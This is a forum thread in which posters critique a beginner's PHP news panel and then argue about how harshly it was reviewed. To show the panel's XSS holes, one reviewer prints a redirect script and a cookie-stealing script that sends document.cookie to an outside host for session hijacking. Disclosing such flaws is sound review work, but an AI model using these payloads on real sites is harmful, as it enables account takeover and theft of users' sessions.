Well basically all i said was "BBCOde is easy, when u start javascript it gets hard".Quote:
Originally Posted by Jxhn
I was just stating a point
Printable View
Well basically all i said was "BBCOde is easy, when u start javascript it gets hard".Quote:
Originally Posted by Jxhn
I was just stating a point
Uncalled for. "/Quote:
Originally Posted by Jackboy
It was still irrelevant. Like someone saying "You're good at football, but you don't tackle enough" and you coming in with "If you think tackling is hard you should try to play cricket, I can."
Hardly, because I spoke about javascript because it can be and is often used with PHP.Quote:
Originally Posted by Jxhn
And I suppose it wasn't completely relevant, but I was just stating a point. Your example was bad too :P
Okay.. I don't get why you've done quite a bit on this thing.. first off..
Why the hell can you view the navigation, latest news, and other bits.. without being logged in? I mean seriously.. why would anyone need to know the location of some of the pages "editnews.php" when they're not logged in?
That just makes it more vulnerable.
http://www.tehupload.com/uploads/app...1146864641.png
--------------------------------------
Second.. your coding is absolutely horrible.. I mean seriously.. all you're doing is repeating code OVER and OVER.
Everytime you clean something.. you repeat the same lines..
Then to make things even funnier.. you do separate queries for updating the same things!PHP Code:$username = stripslashes($username);
$password = stripslashes($password);
$username = mysql_real_escape_string($username);
$password = mysql_real_escape_string($password);
Do you really not know how to code? I mean seriously.. two queries to update the same table with that small bit of information.. my god.PHP Code:mysql_query("UPDATE users SET LastLogin = '$LastLogin' WHERE Username = '$username' AND Password = '$password'");
// Update last login ip address
mysql_query("UPDATE users SET LastLoginIP = '$LastLoginIP' WHERE Username = '$username' AND Password = '$password'");
---------------------------------------
Third.. you don't make it other-site compatible!
There's a lot of code to change to make this stupid thing work..PHP Code:header('location: http://www.freyta.net/newspanel/');
---------------------------------------
Fourth.. why the hell are you doing ob_start() AND session_start().. I see not one place in this where you are working with buffers/cookies.. at all.. so why do you need it?
---------------------------------------
Fifth.. you have no primary key in users! What's the point in id if it's not autoenc and a primary key?
http://www.tehupload.com/uploads/app...8269945445.png
http://www.tehupload.com/uploads/app...4232900458.png
---------------------------------------
This really works / looks good :rolleyes:
Very much aligned..
http://www.tehupload.com/uploads/app...6250890648.png
---------------------------------------
Very good protection against XSS! Very much..
http://www.tehupload.com/uploads/app...5551292735.png
http://www.tehupload.com/uploads/app...6244368059.png
---------------------------------------
You're not a consistant coder at all.. one minute you're doing **** like this:
http://www.tehupload.com/uploads/app...5419684422.png
Then this..
http://www.tehupload.com/uploads/app...0116054974.png
Stick with something for god sakes..
---------------------------------------
LOL at this! What a good query..
Have you never heard of inserting variables into a string? My god..PHP Code:$sql = "INSERT INTO activity (username,activity, ip, date) VALUES ('" . $author . "', '" . $activity . "', '" . $IP . "', '" . $date . "')";
Because that was so hard..PHP Code:$sql = "INSERT INTO `activity` (`username`, `activity`, `ip`, `date`) VALUES('{$author}', '{$activity}', '{$IP}', '{$date}')";
---------------------------------------
Back to the XSS thing.. so now that we've proved it has XSS vulnerabilites.. how easy is it to take over the entire panel.. now that the "Latest News" is shown to anyone who views the panel.. logged in or not..
This is easy..
http://www.tehupload.com/uploads/app...7734761346.png
But what about something like this?
Of course redirecting it to a much.. how can I say.. annoying? Site would be just as easy..Code:<script>window.location = "http://www.google.com";</script>
Or we could get even more advanced (if the panel had user levels).. and begin stealing admin's sessions..
How about something like that? Now we have the user's PHPSESSID and can easily "become them".. because all you check is the $_SESSION['username'].. nothing else..Code:<script type="text/javascript">
var div = $('header');
var element = document.createElement('img');
element.src="http://mysite.com/test.php?cookie="+encodeURI(document.cookie);
element.style.display = "none";
div.appendChild(element);
</script>
how secure..
---------------------------------------
All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure.. and I wouldn't recommend anyone use it.
There are LOADS more things I could say.. and point out.. almost all the panel's coding has at least something to laugh at..
I've went through about 3 of the pages.. and it was a laugh fest.. so maybe you should work on that ;)
0.5/10
- Caleb
There was no need for all of that Caleb..
I saw a need for it.. and that's what matters.. considering it was my post :rolleyes:.Quote:
Originally Posted by Excellent2
He's releasing it for the public to use.. and it should be proven that it's not safe enough to be used on a public site, nor is it of quality coding.
I don't really see a need for your post above.. ;)
What was the need in really insulting his project beyond beleif? Instead you could have just pointed out where he's gone wrong in a mature and sensible manner? Everybody has to start somewhere. It looks like it's his first project.. stop being such a jackass.
I did point out where he has "gone wrong".. my post is full of ways to interpret how he has gone wrong..Quote:
Originally Posted by Excellent2
I know he has to "start somewhere".. but if someone doesn't correct the problems he has now.. he's going to turn out to be a coder like you and various other ones.. with misc. bad habits and coding problems.. and ego issues.
Your opinion on "being a jackass" just sums up pretty much your attitude. I'll be a "jackass" if I want to, you're not anyone to stop me.
You're asking for someone to be mature and have a sensible manner on HabboxForum? You must be new here :P.Quote:
Originally Posted by Excellent2
I didn't say you didn't point out where he went wrong but there was no need to be so abusive and arrogant.Quote:
Originally Posted by Dentafrice
I didn't say anything about you helping him with his coding but when you're insulting him and his project like that it's not right. I don't get how I have ego issues? You should look at your posts and then tell me has the ego. Atleast now I can tell what is right and what is wrong.
Granted I'm not one to stop you but if you really gave a damn about his project you should stop using childish comments like this:
Quote:
All I can say.. is this is a pile of crap.. it halfway works.. looks like crap..
If thats not being a jackass I don't know what is? You started somewhere once and you've developed into one of them egotistical, arrogant people who now think they're better than anybody in anyway possible. Don't think by that I'm saying you're a bad coder because if I did, I'd be lying but I'm sure if you try out a language you don't know and ask for help someone would reply in a much more helpful and mature way.Quote:
almost all the panel's coding has at least something to laugh at..
Learn to structure your criticism around when you first started.